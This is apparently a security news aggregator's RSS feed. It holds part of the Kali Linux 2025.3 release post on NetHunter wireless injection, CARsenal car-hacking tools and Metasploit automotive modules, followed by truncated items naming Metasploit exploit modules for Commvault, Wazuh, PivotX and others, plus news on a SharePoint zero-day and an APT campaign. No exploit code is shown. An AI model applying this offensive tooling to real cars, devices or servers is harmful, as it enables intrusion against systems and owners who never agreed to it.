<p>We are happy to announce that we <strong>finally have a new budget friendly device</strong> since Nexus 5, which supports internal monitor mode with injection on both 2.4Ghz and 5Ghz. After an awesome collaboration, the Kali NetHunter <strong>Samsung Galaxy S10</strong> is born. The <a href="https://github.com/seemoo-lab/nexmon">Nexmon team</a> patched the broadcom firmware, <a href="https://linktr.ee/v0lk3n">@V0lk3n</a> ported the Kali NetHunter kernel, and <a href="https://gitlab.com/yesimxev">@yesimxev</a> released Hijacker arm64 version to avoid app crashes. The install guide is available here for <a href="https://forums.kali.org/t/hijacker-on-the-samsung-galaxy-s10-with-wireless-injection/10305">Nexmon</a> and <a href="https://www.kali.org/docs/nethunter/installing-nethunter-on-the-samsung-galaxy-s10">Kali NetHunter</a>.</p>
<div>

</div>
<h3>CARsenal Update</h3>
<p>Kali NetHunter Car Hacking, CARsenal, continues to expand with a lot of change and new features by @V0lk3n!</p>
<p>You will need to run the setup again, to apply all the new changes and install any new packages.</p>
<div class="notices info">
<p data-header="Info">
Even if it’s a “Car Hacking” toolset, we discourage you from trying this on your daily driver. Use it on a controlled environment. Either OffSec or the Kali team will not take responsibility for your actions, especially if you break your car.
</p>
</div>
<p><strong>What’s New?</strong></p>
<ul>
<li><strong>Main</strong> - Settings has been moved to menu bar and all service commands can be edited by long pressing oranges buttons. New <code>RFCOMM Connect</code> service.</li>
<li><strong>Tools</strong> - Settings has been moved to menu bar. When configuring your settings, tools buttons will be updated with it, and all tools commands can be edited by long pressing oranges buttons.</li>
<li><strong>CAN-USB</strong> - Settings as been moved to menu bar. When configuring your settings, <code>Run</code> button will be updated with it.</li>
<li><strong>Caring Caribou</strong> - All modules and sub-modules as been added to <code>Caribou</code>, excepted <code>doip</code> which should come in 2025.4 update and <code>DCM</code> which is replaced by <code>UDS</code>. All module spinner have been merged into <code>modules</code> and <code>submodules</code> spinner. Settings parameters is now displayed depending of the module/submodule chosen.</li>
<li><strong>ICSim rewrite</strong> - <code>ICSim</code> is renamed to <code>Simulator</code>, and <code>UDSim</code> has been added to it - enjoy more simulation for learning and testing purpose! Also a new feature to hide/display the controls view and to make ICSim/UDSim a float-able window has been added! Keep the simulator in front of your eyes while running tools from CARsenal or NetHunter Terminal!</li>
<li><strong>New MSF tab</strong> - A new MSF tab has been added, providing automotive modules for <a href="https://www.kali.org/tools/metasploit-framework/">Metasploit-Framework</a>. Setup a hardware bridge, connect to it and run post modules!</li>
<li><strong>About dialog</strong> - About dialog page and it’s credit has been updated.</li>
</ul>
<p><strong>What Else?</strong></p>
<ul>
<li><strong>UI</strong> - User Interface has been updated a lot! Thanks to @kimocoder for inspiration!</li>
<li><strong>Bug Fix</strong> - A lot of bug fix and no more outdated libraries used! Thanks again to @kimocoder for this!</li>
<li><strong>CARsenal Refactoring</strong> - Refactoring process of CAN Arsenal to CARsenal is now complete.</li>
<li><strong>Documentation</strong> - Complete rewrite of <a href="https://www.kali.org/docs/nethunter/nethunter-carsenal/">CARsenal documentation</a> for 2025.3 content (no change for the kernel documentation part).</li>
<li><strong>New Kernel Supporting CAN</strong> - OnePlus6 for LineageOS 22.2 (Android 15). Note that it was made for OnePlus6 and not it’s 6T variant. This will be updated soon as well to support it.</li>
</ul>
<p><strong>What to come next?</strong></p>
<p>Expect to see for 2025.4 more UI update, better MSF screen terminal, Simulator update and more! We are also planning to make series of videos demonstrating CARsenal, If you notice a bug or simply wish to have a feature added to CARsenal, get in touch!</p>
<h3>Modules in Magisk</h3>
<p><strong>Kernel modules install with Magisk is now supported</strong> and are included in the released install images. It is still in experimental state. Credits to @yesimxev and <a href="https://gitlab.com/cyberknight777">@cyberknight777</a>.</p>
<h3>Bugfixes &amp; Improvements</h3>
<p>Thanks largely to <a href="https://www.kali.org/blog/kali-linux-2025-3-release/kimocoder">@kimocode</a> who made a lot of code updates improving UI, stability and more!
Bellow is a list of changes:</p>
<ul>
<li>Boot animation is now fixed</li>
<li>Improved/Added API 21 to API 34+</li>
<li>Made <code>busybox_nh</code> available in Android (SU) shell</li>
<li>Made the <code>bootkali</code>" and “<code>killkali</code>” scripts available in Android (SU) shell</li>
<li>Removed the non-working ‘Deauth’ tab (fragment)</li>
<li>Replaced many deprecated libraries</li>
<li>Replaced the deprecated ‘AsyncTask’ with ‘Executer’ which improves threading and background tasks making the application for stable and improve performance</li>
<li>Updated all libraries in use to latest</li>
<li>Updated BusyBox binaries</li>
<li>Updated Gradle / JAVA</li>
<li>Updated the “Audio” fragment</li>
<li>Updated the “GPS” fragment</li>
<li>Updated the kernel “Modules” fragment</li>
<li>Updated vulnerable database list (WPS)</li>
<li>WP3: Fix templates not showing in the Spinner</li>
</ul>
<h3>Playground</h3>
<p>@yesimxev had fun on his car radio again. Let’s combine a Kali NetHunter phone, RTL-SDR, and a car radio. The result? <a href="https://github.com/mebrown47/airspace-visualizer">Airspace visualizer</a> in your car, bringing the wardriving vibes, especially with the radar design. Credits to @ElbaSatGuy for creating this awesome project.</p>
<div>

</div>
<hr>
<p>Finally, he tried out the Bad Bluetooth Attack on his smartwatch, to take over a Samsung tablet.</p>
<div>

</div>
<h2>Kali ARM SBC Updates</h2>
<p>Other than Nexmon, which we have already covered, Kali ARM has also had a few other improvements:</p>
<ul>
<li>We have fixed an issue with the Kernels not always getting updated. </li>
<li>For our Raspberry Pi images, we are now r<strong>ecommending to use the 64-bit (<code>arm64</code>) image</strong> rather than 32-bit (<code>armhf</code>).</li>
<li>The Raspberry Pi 64-bit (<code>arm64</code>) image will also do Raspberry Pi 5! There is <strong>no longer a dedicated image</strong> just for this device.</li>
<li>The <strong>Raspberry Pi 2 doesn’t support 64-bit</strong> (<code>arm64</code>), so if you are still rocking it, grab the 32-bit (<code>armhf</code>). </li>
</ul>
<h2>Miscellaneous</h2>
<p>Below are a few other things which have been updated in Kali, which we are calling out, which do not have as much detail:</p>
<ul>
<li>New <strong><a href="https://www.kali.org/wallpapers/community/">community wallpapers</a></strong> in multiple colors (thanks <a href="https://gitlab.com/IAmNewbie99">@IAmNewbie99</a>)</li>
<li>OffSec, the company who founded Kali, will be soon offering a <strong>free “Capture The Flag” (CTF) event in October</strong> with $100,000 in prizes. For more information, and to pre-register see “<a href="https://www.offsec.com/events/the-gauntlet/?utm_source=kali&amp;utm_medium=web&amp;utm_campaign=blog">The Gauntlet</a>”</li>
<li>A great guide to read: <a href="https://gitlab.com/akabulous/So_You_Want_To_Build_A_Nethunter_Kernel">So You Want To Build A NetHunter Kernel</a></li>
</ul>
<h2>Kali Documentation</h2>
<p>Our <a href="https://www.kali.org/docs/">Kali documentation</a> has had various updates to existing pages as well as new pages:</p>
<ul>
<li><a href="https://www.kali.org/docs/containers/installing-docker-on-kali/">Installing Docker on Kali Linux</a> <em>(Updated)</em></li>
<li><a href="https://www.kali.org/docs/general-use/gpgkey-expiry/">Resolving APT Errors Caused by an Expired Kali Linux Signing Key</a> <em>(New)</em></li>
<li><a href="https://www.kali.org/docs/development/setting-up-packaging-system/">Setting up a system for packaging</a> <em>(Updated)</em></li>
<li><a href="https://www.kali.org/tools/bloodhound/#reset-bloodhounds-admin-password">Reset Bloodhound’s admin password</a> <em>(Updated)</em> </li>
</ul>
<h2>Kali Blog Recap</h2>
<p>Since our last release, we did the following <a href="https://www.kali.org/blog/">blog posts</a>:</p>
<ul>
<li><a href="https://www.kali.org/blog/raspberry-pi-wi-fi-glow-up/">The Raspberry Pi’s Wi-Fi Glow-Up</a></li>
<li><a href="https://www.kali.org/blog/kali-apple-container-containerization/">Kali Linux &amp; Containerization (Apple’s Container)</a></li>
<li><a href="https://www.kali.org/blog/kali-vagrant-rebuilt/">Kali Vagrant Rebuilt: Out With Packer, In With DebOS</a></li>
</ul>
<h2>Community Shout-Outs</h2>
<p>These are <strong>people from the public who have helped Kali</strong> and the team for the last release. And we want to praise them for their work <em>(we like to give credit where due!)</em>:</p>
<ul>
<li><a href="https://gitlab.com/Arszilla">@Arszilla</a></li>
<li><a href="https://gitlab.com/cjp256">@Chris Patterson</a></li>
<li><a href="https://gitlab.com/eko.wibowo87">@Eko Wibowo</a></li>
<li><a href="https://gitlab.com/Funeoz">@Funeoz</a></li>
<li><a href="https://gitlab.com/hinoshiba">@hinoshiba</a></li>
<li><a href="https://gitlab.com/IAmNewbie99">@IAmNewbie99</a></li>
<li><a href="https://gitlab.com/serval123">@serval</a></li>
</ul>
<p>Anyone can help out, anyone can get <a href="https://www.kali.org/docs/community/contribute/">involved</a>!</p>
<h3>New Kali Mirrors</h3>
<p>First, we have a new machine to host our tier-0 mirror <code>archive.kali.org</code>! The tier-0 mirror is the source from where all the other mirrors sync. This new machine has more bandwidth; we went <strong>from 500 Mb/s to 3 Gb/s</strong>, in other words we increased capacity by 6! In practical terms, it means mirrors will sync faster, which is especially relevant for “big syncs”, when a lot of new packages land in the repository at once. Faster mirror syncs means users get new packages faster, and it means smoother operations overall. This is a very welcome upgrade, long overdue!</p>
<p>Now, for the list of new Kali mirrors, this release cycle was again busy, we welcomed <strong>6 new mirrors in Asia</strong>:</p>
<ul>
<li>China: <a href="https://mirror.nju.edu.cn/kali/">mirror.nju.edu.cn</a>, sponsored by the <a href="https://sci.nju.edu.cn/">eScience Center, Nanjing University</a>, thanks to YAO Ge.</li>
<li>China: <a href="https://mirror.nyist.edu.cn/kali/">mirror.nyist.edu.cn</a>, sponsored by the <a href="https://www.nyist.edu.cn/">Nanyang Institute of Technology</a>, thanks to Palve.</li>
<li>China: <a href="https://mirrors.tuna.tsinghua.edu.cn/kali/">mirrors.tuna.tsinghua.edu.cn</a>, sponsored by the <a href="https://www.tsinghua.edu.cn/en/">Tsinghua University</a>, thanks to Miao Wang.</li>
<li>Japan: <a href="https://mirror.tefexia.net/kali/">mirror.tefexia.net</a>, sponsored by <a href="https://www.tefexia.net/">Tefexia</a>, thanks to Seungha Lee.</li>
<li>South Korea: <a href="https://mirror.jeonnam.school/kali/">mirror.jeonnam.school</a>, sponsored by <a href="http://jeonnam.gen.hs.kr/">Jeonnam High School</a>, thanks to Wonchan Lee.</li>
<li>South Korea: <a href="https://mirror.zzunipark.com/kali/">mirror.zzunipark.com</a>, sponsored by <a href="https://homelab.zzunipark.com/">zzuniMirror</a>, thanks to MinJun Park.</li>
</ul>
<p>We also welcomed a pair of mirrors sponsored by <a href="https://www.ionos.com/">IONOS</a>, thanks to William Fleurant:</p>
<ul>
<li>Germany: <a href="https://eu.mirror.ionos.com/kali/">eu.mirror.ionos.com</a></li>
<li>United States: <a href="https://us.mirror.ionos.com/kali/">us.mirror.ionos.com</a></li>
</ul>
<p>If you have the disk space and bandwidth, <a href="https://www.kali.org/docs/community/setting-up-a-kali-linux-mirror/">we always welcome new mirrors</a>.</p>
<hr>
<h2>Get Kali Linux 2025.3</h2>
<p><strong>Fresh Images</strong>:
So what are you waiting for? Go <a href="https://www.kali.org/get-kali/">get Kali</a> already!</p>
<p>Seasoned Kali Linux users are already aware of this, but for those who are not, we also produce <strong><a href="https://cdimage.kali.org/kali-images/kali-weekly/">weekly builds</a></strong> that you can use. If you cannot wait for our next release and you want the latest packages <em>(or bug fixes)</em> when you download the image, you can just use the weekly image instead.
This way you will have fewer updates to do.
<em>Just know that these are automated builds that we do, not QA like we do for our standard <a href="https://www.kali.org/releases/">release images</a></em>. But we gladly take <a href="https://bugs.kali.org/">bug reports</a> about those images because we want any issues to be fixed before our next release!</p>
<p><strong>Existing Installs</strong>:
If you already have an existing Kali Linux installation, remember you can always do a quick <a href="https://www.kali.org/docs/general-use/updating-kali/">update</a>:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ echo "deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware" | sudo tee /etc/apt/sources.list
[...]
┌──(kali㉿kali)-[~]
└─$ sudo apt update &amp;&amp; sudo apt -y full-upgrade
[...]
┌──(kali㉿kali)-[~]
└─$ cp -vrbi /etc/skel/. ~/
[...]
┌──(kali㉿kali)-[~]
└─$ [ -f /var/run/reboot-required ] &amp;&amp; sudo reboot -f
</code></pre>
<p>You should now be on Kali Linux 2025.3. We can do a quick check by doing:</p>
<pre><code class="language-console">┌──(kali㉿kali)-[~]
└─$ grep VERSION /etc/os-release
VERSION="2025.3"
VERSION_ID="2025.3"
VERSION_CODENAME="kali-rolling"
┌──(kali㉿kali)-[~]
└─$ uname -v
#1 SMP PREEMPT_DYNAMIC Kali 6.12.38-1kali1 (2025-08-12)
┌──(kali㉿kali)-[~]
└─$ uname -r
6.12.38+kali-amd64
</code></pre>
<p><em>NOTE: The output of <code>uname -r</code> may be different depending on the system <a href="https://pkg.kali.org/pkg/linux">architecture</a>.</em></p>
<hr>
<p>As always, should you come across any bugs in Kali, please submit a report on our <a href="https://bugs.kali.org/">bug tracker</a>. <em>We will never be able to fix what we do not know is broken!</em> <strong>And Social networks are not bug trackers!</strong></p>
<hr>
<p>Want to keep up-to-date easier? We’ve got you!</p>
<ul>
<li><a href="https://www.kali.org/blog/">Blog</a>? Use our <a href="https://www.kali.org/rss.xml">RSS feed</a> and <a href="https://www.kali.org/newsletter/">newsletter</a> </li>
<li><a href="https://www.kali.org/get-kali/">Download</a>? We have a <a href="https://www.kali.org/torrents.xml">Torrent RSS feed</a></li>
<li><a href="https://www.kali.org/docs/community/list-of-official-kali-sites/#social-media-networks">Socials</a>? <a href="https://bsky.app/profile/kalilinux.bsky.social">Bluesky</a>, <a href="https://www.facebook.com/KaliLinux/">Facebook</a>, <a href="https://www.instagram.com/kalilinux/">Instagram</a>, <a href="https://infosec.exchange/@kalilinux">Mastodon</a> &amp; <a href="https://x.com/kalilinux">X</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Commvault CLI Argument Injection / Traversal / Remote Code Execution]]></title>
<description><![CDATA[Topic: Commvault CLI Argument Injection / Traversal / Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/2996304/sicherheitsluecken/commvault-cli-argument-injection-traversal-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2996304/sicherheitsluecken/commvault-cli-argument-injection-traversal-remote-code-execution/</guid>
<pubDate>Sun, 21 Sep 2025 19:35:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Commvault CLI Argument Injection / Traversal / Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft: Hacker konnten wohl beliebige Entra-ID-Tenants kapern - Golem.de]]></title>
<description><![CDATA[Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning. E-Learning: Exklusiv: IT-Security Komplettpaket: Ethical Hacking & ...]]></description>
<link>https://tsecurity.de/de/2992352/hacking/microsoft-hacker-konnten-wohl-beliebige-entra-id-tenants-kapern-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2992352/hacking/microsoft-hacker-konnten-wohl-beliebige-entra-id-tenants-kapern-golemde/</guid>
<pubDate>Fri, 19 Sep 2025 03:50:36 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Exklusiv: IT-Security Komplettpaket: Ethical <b>Hacking</b> &amp; Metasploit (7 E-Learning. E-Learning: Exklusiv: IT-Security Komplettpaket: Ethical <b>Hacking</b> &amp; ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Digitalisierung: Das digitalste Dorf der Welt liegt in Deutschland - Golem.de]]></title>
<description><![CDATA[IT-Security Expert (m/w/d) Security Monitoring Soluvia IT-Services GmbH ... Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E- ...]]></description>
<link>https://tsecurity.de/de/2992017/it-security-nachrichten/digitalisierung-das-digitalste-dorf-der-welt-liegt-in-deutschland-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2992017/it-security-nachrichten/digitalisierung-das-digitalste-dorf-der-welt-liegt-in-deutschland-golemde/</guid>
<pubDate>Thu, 18 Sep 2025 20:04:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>IT</b>-<b>Security</b> Expert (m/w/d) Security Monitoring Soluvia IT-Services GmbH ... Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Googles Gemini 2.5: KI schlägt erstmals Menschen im Programmierwettkampf ICPC]]></title>
<description><![CDATA[E-Learning: Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning Kurse im Paket) ... Die KI demonstrierte laut Google ...]]></description>
<link>https://tsecurity.de/de/2990247/it-security-nachrichten/googles-gemini-25-ki-schlaegt-erstmals-menschen-im-programmierwettkampf-icpc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2990247/it-security-nachrichten/googles-gemini-25-ki-schlaegt-erstmals-menschen-im-programmierwettkampf-icpc/</guid>
<pubDate>Thu, 18 Sep 2025 03:47:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[E-Learning: Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E-Learning Kurse im Paket) ... Die KI demonstrierte laut Google ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Sitecore XP Post-Authentication File Upload]]></title>
<description><![CDATA[Topic: Sitecore XP Post-Authentication File Upload Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/2983412/sicherheitsluecken/sitecore-xp-post-authentication-file-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2983412/sicherheitsluecken/sitecore-xp-post-authentication-file-upload/</guid>
<pubDate>Sun, 14 Sep 2025 18:52:04 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Sitecore XP Post-Authentication File Upload Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Streit um Verbrennerverbot: Die Autoindustrie traut ihren eigenen Fähigkeiten nicht]]></title>
<description><![CDATA[Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning ... IT (Cyber) Security Specialist – Incident Responder (m/w/d) SySS ...]]></description>
<link>https://tsecurity.de/de/2979463/it-security-nachrichten/streit-um-verbrennerverbot-die-autoindustrie-traut-ihren-eigenen-faehigkeiten-nicht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2979463/it-security-nachrichten/streit-um-verbrennerverbot-die-autoindustrie-traut-ihren-eigenen-faehigkeiten-nicht/</guid>
<pubDate>Fri, 12 Sep 2025 00:04:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E-Learning ... IT (<b>Cyber</b>) <b>Security</b> Specialist – Incident Responder (m/w/d) SySS ...]]></content:encoded>
</item>
<item>
<title><![CDATA[iPhone, Apple Watch und Co.: So denkt die Golem-Redaktion über die neuen Apple-Geräte]]></title>
<description><![CDATA[E-Learning: Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning Kurse im Paket) ... Ich frage mich aber, ob das iPhone Air ...]]></description>
<link>https://tsecurity.de/de/2977282/it-security-nachrichten/iphone-apple-watch-und-co-so-denkt-die-golem-redaktion-ueber-die-neuen-apple-geraete/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2977282/it-security-nachrichten/iphone-apple-watch-und-co-so-denkt-die-golem-redaktion-ueber-die-neuen-apple-geraete/</guid>
<pubDate>Wed, 10 Sep 2025 23:04:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[E-Learning: Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E-Learning Kurse im Paket) ... Ich frage mich aber, ob das iPhone Air ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Betriebssysteme: Anscheinend verliert Windows 11 wieder Marktanteile - Golem.de]]></title>
<description><![CDATA[Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning ... IT-Produktbetreuerin / IT-Produktbetreuer und IT-Produktentwicklerin ...]]></description>
<link>https://tsecurity.de/de/2977145/it-security-nachrichten/betriebssysteme-anscheinend-verliert-windows-11-wieder-marktanteile-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2977145/it-security-nachrichten/betriebssysteme-anscheinend-verliert-windows-11-wieder-marktanteile-golemde/</guid>
<pubDate>Wed, 10 Sep 2025 21:04:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E-Learning ... IT-Produktbetreuerin / IT-Produktbetreuer und IT-Produktentwicklerin ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Ukrainekrieg: Unbewaffnetes Schulungsflugzeug zur Drohnenjagd eingesetzt - Golem.de]]></title>
<description><![CDATA[zum Kurs. Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning. E-Learning: Exklusiv: IT-Security Komplettpaket ...]]></description>
<link>https://tsecurity.de/de/2959397/it-security-nachrichten/ukrainekrieg-unbewaffnetes-schulungsflugzeug-zur-drohnenjagd-eingesetzt-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2959397/it-security-nachrichten/ukrainekrieg-unbewaffnetes-schulungsflugzeug-zur-drohnenjagd-eingesetzt-golemde/</guid>
<pubDate>Tue, 26 Aug 2025 23:48:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[zum Kurs. Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E-Learning. E-Learning: Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Klage von GMX und Web.de: Google darf Gmail-Konto bei Android nicht bevorzugen]]></title>
<description><![CDATA[Exklusiv: IT-Security Komplettpaket: Ethical Hacking & Metasploit (7 E-Learning. E-Learning: Exklusiv: IT-Security Komplettpaket: Ethical Hacking ...]]></description>
<link>https://tsecurity.de/de/2957595/it-security-nachrichten/klage-von-gmx-und-webde-google-darf-gmail-konto-bei-android-nicht-bevorzugen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2957595/it-security-nachrichten/klage-von-gmx-und-webde-google-darf-gmail-konto-bei-android-nicht-bevorzugen/</guid>
<pubDate>Tue, 26 Aug 2025 06:50:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking &amp; Metasploit (7 E-Learning. E-Learning: Exklusiv: <b>IT</b>-<b>Security</b> Komplettpaket: Ethical Hacking ...]]></content:encoded>
</item>
<item>
<title><![CDATA[PivotX 3.0.0 RC 3 Remote Code Execution]]></title>
<description><![CDATA[Topic: PivotX 3.0.0 RC 3 Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/2938535/sicherheitsluecken/pivotx-300-rc-3-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2938535/sicherheitsluecken/pivotx-300-rc-3-remote-code-execution/</guid>
<pubDate>Thu, 14 Aug 2025 00:06:22 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: PivotX 3.0.0 RC 3 Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh Server Remote Code Execution]]></title>
<description><![CDATA[Topic: Wazuh Server Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/2938534/sicherheitsluecken/wazuh-server-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2938534/sicherheitsluecken/wazuh-server-remote-code-execution/</guid>
<pubDate>Thu, 14 Aug 2025 00:06:21 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Wazuh Server Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Pandora ITSM Authenticated Command Injection]]></title>
<description><![CDATA[Topic: Pandora ITSM Authenticated Command Injection Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/2932618/sicherheitsluecken/pandora-itsm-authenticated-command-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2932618/sicherheitsluecken/pandora-itsm-authenticated-command-injection/</guid>
<pubDate>Mon, 11 Aug 2025 03:07:23 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Pandora ITSM Authenticated Command Injection Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious XDG Desktop File]]></title>
<description><![CDATA[Topic: Malicious XDG Desktop File Risk: Medium Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/2923386/sicherheitsluecken/malicious-xdg-desktop-file/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2923386/sicherheitsluecken/malicious-xdg-desktop-file/</guid>
<pubDate>Tue, 05 Aug 2025 14:15:50 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Malicious XDG Desktop File Risk: Medium Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious Windows Registration Entries (.reg) File]]></title>
<description><![CDATA[Topic: Malicious Windows Registration Entries (.reg) File Risk: Medium Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/2904770/sicherheitsluecken/malicious-windows-registration-entries-reg-file/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2904770/sicherheitsluecken/malicious-windows-registration-entries-reg-file/</guid>
<pubDate>Thu, 24 Jul 2025 21:50:28 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Malicious Windows Registration Entries (.reg) File Risk: Medium Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Module Released to Exploit SharePoint 0-Day Vulnerabilities]]></title>
<description><![CDATA[Security researchers have released a Metasploit exploitation module targeting critical zero-day vulnerabilities in Microsoft SharePoint Server, marking a significant escalation in the threat landscape for enterprise collaboration platforms. The module exploits a chain of unauthenticated remote co...]]></description>
<link>https://tsecurity.de/de/2903618/hacking/metasploit-module-released-to-exploit-sharepoint-0-day-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2903618/hacking/metasploit-module-released-to-exploit-sharepoint-0-day-vulnerabilities/</guid>
<pubDate>Thu, 24 Jul 2025 11:19:40 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Security researchers have released a Metasploit exploitation module targeting critical zero-day vulnerabilities in Microsoft SharePoint Server, marking a significant escalation in the threat landscape for enterprise collaboration platforms. The module exploits a chain of unauthenticated remote code execution flaws identified as CVE-2025-53770 and CVE-2025-53771, which were discovered being actively exploited in the wild as early […]</p>
<p>The post <a href="https://gbhackers.com/metasploit-module-exploit-sharepoint-vulnerabilities/">Metasploit Module Released to Exploit SharePoint 0-Day Vulnerabilities</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[UNG0002 Deploys Weaponized LNK Files with Cobalt Strike and Metasploit to Target Organizations]]></title>
<description><![CDATA[Seqrite Labs APT-Team has uncovered a persistent threat entity, UNG0002 (Unknown Group 0002), orchestrating espionage-driven operations across Asian jurisdictions, including China, Hong Kong, and Pakistan. Active since at least May 2024, this South-East Asia-based cluster has demonstrated a high ...]]></description>
<link>https://tsecurity.de/de/2898951/hacking/ung0002-deploys-weaponized-lnk-files-with-cobalt-strike-and-metasploit-to-target-organizations/</link>
